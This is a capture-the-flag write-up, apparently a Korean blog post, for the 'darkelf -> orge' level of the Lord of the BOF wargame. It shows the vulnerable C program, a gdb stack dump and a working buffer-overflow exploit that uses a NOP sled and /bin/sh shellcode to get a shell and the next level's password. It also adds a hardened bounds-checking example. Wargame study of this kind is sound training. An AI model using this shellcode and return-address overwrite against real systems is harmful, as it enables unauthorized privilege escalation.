[LOB] darkelf -> orge
2019. 7. 29. 00:13ㆍWargame & CTF/LOB
```c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orge
        - check argv[0]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memset, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // here is changed!
        if(strlen(argv[0]) != 77){
                printf("argv[0] error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}
```
It checks whether argv[0] is exactly 77 characters long; if it is not, the program calls exit(0).
[buffer(40)][SFP(4)][RET(4)]
Because buffer is zeroed out afterwards, the approach is the same as before: put the shellcode in argv[2] and make argv[0] exactly 77 characters long.
Since we normally run the program as ./FILENAME, the 77 characters must include the leading ./ prefix.
argv[0] is the file name. A symbolic link would work too, but for simplicity I'll just rename the file.
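As an added illustration (not part of the original writeup), the C below contrasts orge's own length check, which lets 48 bytes into a 40-byte buffer so that the last 8 land on SFP and RET, with a bounds check that rejects anything that does not fit together with its terminating NUL. The function names and the 48-byte sample argument are my own constructions, built to match the [buffer(40)][SFP(4)][RET(4)] layout above.

```c
#include <string.h>

#define BUF_SIZE 40   /* orge's char buffer[40] */
#define ORGE_MAX 48   /* orge rejects only strlen(argv[1]) > 48 */

/* Mirrors orge's length check: 1 if the argument passes, 0 if rejected. */
int orge_check_accepts(const char *arg)
{
    return strlen(arg) <= ORGE_MAX;
}

/* Bytes that strcpy(buffer, arg) writes past the 40-byte buffer (NUL
 * excluded): with 48 bytes that is 8, exactly SFP(4) + RET(4). */
size_t overflow_bytes(const char *arg)
{
    size_t n = strlen(arg);
    return n > BUF_SIZE ? n - BUF_SIZE : 0;
}

/* Hardened replacement for strcpy: copy only when the string and its
 * terminating NUL fit in dst. Returns 1 on copy, 0 on reject. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_size)
        return 0;
    memcpy(dst, src, n + 1);
    return 1;
}

/* The same check applied to a local 40-byte buffer, as orge would need. */
int hardened_accepts(const char *arg)
{
    char buf[BUF_SIZE];
    return safe_copy(buf, sizeof buf, arg);
}

/* Constructed sample with the writeup's layout: 44 filler bytes followed
 * by 4 bytes that land on RET (48 bytes, plus NUL). */
const char *sample_arg(void)
{
    static char s[ORGE_MAX + 1];
    memset(s, 'A', 44);
    memset(s + 44, '\xbf', 4);
    s[ORGE_MAX] = '\0';
    return s;
}
```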
```
[darkelf@localhost darkelf]$ mv orge `python -c 'print "A"*75'`
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  orge.c  tmp
```
The rename worked.
```
[darkelf@localhost tmp]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[darkelf@localhost tmp]$ gdb -q AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA core
warning: core file may not match specified executable file.
Core was generated by `./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffff600:     0x00000000      0xbffff644      0xbffff654      0x40013868
0xbffff610:     0x00000003      0x08048450      0x00000000      0x08048471
0xbffff620:     0x08048500      0x00000003      0xbffff644      0x08048390
0xbffff630:     0x0804866c      0x4000ae60      0xbffff63c      0x40013e90
0xbffff640:     0x00000003      0xbffff747      0xbffff795      0xbffff7c6
0xbffff650:     0x00000000      0xbffffbc8      0xbffffbde      0xbffffbf6
0xbffff660:     0xbffffc15      0xbffffc37      0xbffffc49      0xbffffc56
0xbffff670:     0xbffffe19      0xbffffe38      0xbffffe52      0xbffffe67
0xbffff680:     0xbffffe7c      0xbffffe87      0xbffffea0      0xbffffeb0
0xbffff690:     0xbffffeb8      0xbffffec9      0xbffffed7      0xbffffee5
0xbffff6a0:     0xbffffef6      0xbfffff04      0xbfffff0f      0xbfffff22
0xbffff6b0:     0xbfffff5e      0x00000000      0x00000003      0x08048034
0xbffff6c0:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffff6d0:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffff6e0:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffff6f0:     0x0000000b      0x000001fa      0x0000000c      0x000001fa
0xbffff700:     0x0000000d      0x000001fa      0x0000000e      0x000001fa
0xbffff710:     0x00000010      0x0f8bfbff      0x0000000f      0xbffff742
0xbffff720:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff730:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0xbffff740:     0x36690000      0x2e003638      0x4141412f      0x41414141
0xbffff750:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff760:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414100      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7c0:     0xbfbfbf41      0x909000bf      0x90909090      0x90909090
0xbffff7d0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff7e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff7f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff800:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff810:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff820:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff830:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff840:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff850:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff860:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff870:     0x90909090      0x90909090      0x90909090      0x90909090
```
I'll use a NOP sled again this time.
```
[darkelf@localhost darkelf]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44+"\x01\xf8\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
bash$ my-pass
euid = 507
timewalker
```
orge : timewalker